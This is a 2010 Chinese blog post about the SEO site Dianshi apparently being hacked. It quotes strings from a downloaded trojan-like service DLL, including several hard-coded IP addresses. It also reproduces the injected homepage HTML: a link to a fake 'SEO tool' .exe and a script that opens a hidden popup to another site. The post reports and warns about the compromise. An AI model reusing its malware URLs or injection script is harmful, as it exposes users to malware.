可怜的点石,杯具了。。。

2010 - 4 - 25 作者 : 石家庄SEO 分类 :杂谈

点击查看原图

 

2010-04-25 18:41:13

发现 点石 这样了  ,一个弹窗 下载下来的貌似是个html文件

还是个加密的

下载下来,用nod32 杀毒发现不是病毒  用记事本打开 有几句是这个

This program cannot be run in DOS mode。

 

 MS Driver Management Service                                                                                                                                                                            管理系统硬件与驱动程序间的交互。                                                                                                                                                                        %ProgramFiles%\data.dll                                                                                                                                                                                   wb  %s  netsvcs SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost    ?@     .PAD    DLL BIN \plugin_info.ini    C:\NewBook  SeRestorePrivilege  SeBackupPrivilege   %s%s%s  \Parameters ServiceDll  SOFTWARE\Parameters Description %SystemRoot%\System32\svchost.exe -k netsvcs    %s%s    SYSTEM\CurrentControlSet\Services\  cmd /c del  sbSu8QK8pqa0tLz98AWor6+ung== XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX    SUpdate kernel32.dll    CreateToolhelp32Snapshot    SetLayeredWindowAttributes  User32.DLL             

貌似是 dos 下注册一个 .dell 文件

B I T S     AAAA    A A A A     Mozilla/4.0 (compatible)    https://    http:// ~ M H z     H A R D W A R E \ D E S C R I P T I O N \ S y s t e m \ C e n t r a l P r o c e s s o r \ 0     - -     H o s t     S Y S T E M \ C u r r e n t C o n t r o l S e t \ S e r v i c e s \ % s     O T H E R   B U S Y     P R O X Y   L A N   M O D E M   G A M E P L A Z A . E X E   R O O M . E X E     L O B B Y . E X E   S Y S T E M \ C u r r e n t C o n t r o l S e t \ S e r v i c e s \     \ p l u g i n _ i n f o . i n i     % s % s     G l o b a l \ a s d f w e e   % d   w i n s t a 0   S e R e s t o r e P r i v i l e g e     S e B a c k u p P r i v i l e g e   S Y S T E M \ C u r r e n t C o n t r o l S e t \ S e r v i c e s \ B I T S \ P a r a m e t e r s   S e r v i c e D l l     255.255.255.0   124.238.243.51  221.194.142.26  124.238.243.74  125.39.100.74   220.181.126.7   \ b i t s . d l l   \ i n f o . d l l   .mdata  rb+ W i n S t a 0 \ D e f a u l t       % 1     " % 1   % s \ s h e l l \ o p e n \ c o m m a n d   . .     .   % s \ * . *     % s \ % s   % s % s % s     % s % s * . *   \   Http/1.1 403 Forbidden

<body><h1>403 Forbidden</h1></body>   安防的HTTP/1.0 200 OK

这有一个  html 代码 

呵呵, 看来这个  不是官方的

官方首页 也换了

代码是

 

      <p><font color="#ff0000"><b>2010-04-25&nbsp;&nbsp;&nbsp;&nbsp; 点石互动 迎接5月1日 免费发布 网站优化工具好帮手 让你的网站一时间暴收录 pr猛涨</b>
        &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="http://www.cof.net.cn/ad/seo网站工具.exe">下载地址一</a>&nbsp;&nbsp;&nbsp;
  <a href="http://www.cof.net.cn/ad/seo网站工具.exe">下载地址二</a>&nbsp;&nbsp;

 

 

 

<a href="http://www.51.la/?3739130" target="_blank"><img alt="&#x6211;&#x8981;&#x5566;&#x514D;&#x8D39;&#x7EDF;&#x8BA1;" src="http://img.users.51.la/3739130.asp" style="border:none" /></a>

 

<script language="javascript">
focusid=setTimeout("focus();window.showModelessDialog('http://www.gvodtx.com/','','scroll:1;status:0;help:0;resizable:1;dialogWidth:0px;dialogHeight:0px')",0000)
</script>

 

3658 人围观 / 1 条评论 ↓快速评论↓

  • What broad daylight isn't today?

    Beipsebeeme 2012-05-08 23:36 回复

(必须)

(必须,保密)

阿狸1 阿狸2 阿狸3 阿狸4 阿狸5 阿狸6 阿狸7 阿狸8 阿狸9 阿狸10 阿狸11 阿狸12 阿狸13 阿狸14 阿狸15 阿狸16 阿狸17 阿狸18